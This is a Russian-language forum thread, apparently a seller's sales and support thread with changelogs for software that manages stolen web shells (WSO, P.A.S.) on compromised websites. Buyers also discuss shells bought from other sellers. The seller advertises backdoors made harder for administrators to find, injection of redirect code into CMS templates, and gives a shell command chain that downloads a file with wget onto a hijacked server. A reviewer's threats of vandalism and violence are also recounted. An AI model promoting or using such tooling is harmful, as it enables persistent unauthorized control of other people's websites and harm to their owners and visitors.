UP: СПОРТ БЫЛ РЕШЁН МОДЕРАТОРАМИ РАЗДЕЛА! ФУНКЦИОНАЛ, КОТОРЫЙ МЫ ДОРАБАТЫВАЛИ ОКАЗАЛСЯ ПОЛНОСТЬЮ РАБОЧИМ. ПРИ ЭТОМ АВТОР ПОСТА НЕ ИЗВИНИЛСЯ И СООБЩЕНИЕ С НЕЛЕПОЙ РЕЦЕНЗИЙ НЕ СТЁР. НА ЗАМЕТКУ О АВТОРЕ ОТЗЫВА: ХОТЕЛ ЦАРАПАТЬ мне МАШИНУ, ЗВОНИТЬ И ОТПРАВЛЯТЬ КАКИЕ-ТО МОИ ГАЗЕЛИ ПО ЛЕВЫМ АДРЕСАМ, ГРОЗИЛСЯ ГОПНИКАМИ, КОТОРЫЕ ВСТРЕТЯТ МЕНЯ И НАКАЖУТ У ПОДЪЕЗДА. ОТ ЛИЧНОЙ ВСТРЕЧИ И ПИЗДЮЛЕЙ ОТКАЗАЛСЯ. ВЫВОДЫ ДЕЛАЙТЕ САМИ.
После очередного обновления, слетел проект вместе с бекапами! Такое вообще возможно??? У кого такое было, отпишите
Версия 8.73 (02.06.2017) - Восстановлено получение доноров linkpad Версия 8.72 (29.05.2017) - Исправлена работы SQL с шеллом PAS Версия 8.71 (26.05.2017) - Исправлена ошибка добавления редиректов - Изменён метод обновления списка шеллов - Изменён встроенный почтовый ящик для проверки sendmail Версия 8.70 (20.05.2017) - Обновлена обработка blacklist - Добавлены описания к некоторым настройкам Версия 8.69 (12.05.2017) - Исправлены ошибка открытия проекта - Обновлены инструменты выполнения команд консоли и PHP
Написали подробное руководство по работе с программой (это 40 страниц текста со скриншотами) Если кому-то необходимо прямо сейчас, обращайтесь, вышлю в .doc. А так, ждём ещё несколько дней до первого обновления и справка будет доступна по F1. Также, хотел бы немного дать инфы для покупателей и обладателей лицензий. За последнее время функционал софта несколько увеличился: Мы добавили SEO-чекеры: (linkpad, moz и убрали DMOZ и индекс Яндекса, который оказался бесполезным) Мы проработали запись в активные шаблоны CMS (добавили определение активных шаблонов для bitrix, wordpress, joomla, drupal) Мы доработали механизмы поиска доменов (в основном это была платная доработка для пользователя, но стала доступна всем, поиск через robots.txt, sitemap.xml, метод перебора). Доработали механиз установки и восстановление через бэкдоры. Теперь бэкдоры разные, искать админам их стало проблематичнее. Мы добавили возможность давать шеллы несколько команд подряд, например теперь можете сделать что-то вроде: mkdir test cd test wget http://site.com/file.zip unzip file.zip rf -f file.zip Конечно наиболее ярким событием стало добавление поддержки шелла P.A.S, мы проверили и отладили все функции для корректной работы с ним. Мы многое починили, например из строя выходили чекеры, из-за изменений на стороне сервисов. За время существования мы отработали 184 тикета. Мы работаем для Вас уже более 3-х лет!
Версия 8.76 (11.07.2017) - Добавлена справка. Вызов через F1 (мы постарались описать все функции программы и подробно со скриншотами описали их, надеемся, это поможет Вам более продуктивно использовать программу). Версия 8.75 (30.06.2017) - Обновлены модули авторизации и регистрации (были проблемы а привязкой, если на один e-mail было несколько ключей, а также периодически возникали другие сложности, которые тоже исправили). - Добавлена настройка автосохранения базы шеллов
Версия 8.77 (20.07.2017) - Исправлена функция автологина для P.A.S. - Исправлен модули запись в файл для P.A.S. - Исправлен модули поиск файлов для P.A.S. - В умолчания добавлен параметра "_l_" для передачи пароля в шеллах P.A.S. - Добавлена возможность редактировать PHP-код для редиректов - Исправлена ошибка загрузки проектов
Плохо работает определение прав на чтение/запись в корневой папке шелла. Я доказывал селлеру, что его шеллы почти все без прав на запись в корне. в итоге я оказался не прав на значительную сумму товара.
Стоит понимать, что программа работает со стандартным WSO-шеллом. Со всеми шеллами, всех барыг, софт конечно не может работать на 100% корректно, с некоторыми шеллами не работает и во все. Поэтому прежде чем гнать на софт, скачайте стандартный wso с rdot, загрузите и проверьте права. Если ошибка с определением прав останется - пример пришлите на багтрекер. Хотя я сомневаюсь, что такой пример будет.
Версия 8.80 (12.09.2017) - Обновлены библиотеки OpenSSL Версия 8.79 (08.09.2017) - Накопительное обновление, исправлены различные ошибки в работе интерфейса Версия 8.78 (21.07.2017) - Добавлена функция автовосстановления конфига
Версия 8.82 (19.09.2017) - Исправлена ошибка сортировки и выбора всех шеллов - Изменён алгоритм добавления файлов в списки изменённых и загруженных Версия 8.81 (17.09.2017) - Добавлен автопереход шеллов на https при Проверке статуса
Странно как-то, правда странно) Если что, купить мой софт можно по ссылке в первом сообщении. А вообще, хз, у меня никаких сообщений нет)
Версия 8.86 (04.03.2018) - Обновлено отображение текстовых полей - Добавлена обработка редиректа при определении статуса главной страницы - Добавлена возможность отключить функцию определении статуса главной страницы - Исправлена ошибка определения даты файла в новых шеллах P.A.S. - Обновлён модуль поиска доменов (учитываются найденные ранее домены на этом шелле) - Исправлена ошибка записи/дозаписи в файл из шаблонов - Исправлен поиск файлов по имени и тексту в шеллах P.A.S. - Исправлена ошибка отправки файла на сайт - Добавлен столбец "Тип шелла" (WSO или PAS) Версия 8.85 (28.02.2017) - Добавлена функция определения статуса главной страницы сайта - Исправлено определения AlexaRank
Версия 8.90 (16.09.2018) - Исправлены ошибки авторизации - Добавлено меню настроек на вкладку "Главное"
Версия 8.91 (14.10.2018) - Добавлена возможность работы со скриптами Simple - Исправлено определение BlackList - Исправлено определение Siteworthtraffic